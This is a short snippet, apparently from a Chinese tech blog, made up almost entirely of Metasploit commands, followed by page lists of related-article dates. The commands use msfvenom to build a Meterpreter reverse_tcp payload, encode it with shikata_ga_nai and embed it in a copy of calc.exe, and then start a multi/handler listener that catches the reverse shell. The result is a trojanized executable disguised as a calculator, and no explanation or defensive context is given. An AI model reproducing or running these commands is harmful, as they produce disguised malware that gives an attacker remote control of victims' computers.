#client
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.8.106 LPORT=9999 -e x86/shikata_ga_nai -b '\x00' -x /root/demo/calc.exe -f exe > demo.exe

#server:
msfconsole
msf>
use exploit/multi/handler
set LHOST 192.168.8.106
set LPORT 9999
show options
exploit -z -j

相关文章:

  • 2022-12-23
  • 2022-12-23
  • 2021-07-28
  • 2021-05-18
  • 2022-02-19
  • 2022-01-26
  • 2021-07-04
猜你喜欢
  • 2022-12-23
  • 2022-12-23
  • 2022-02-05
  • 2022-12-23
  • 2021-06-08
  • 2022-12-23
  • 2022-03-01
相关资源
相似解决方案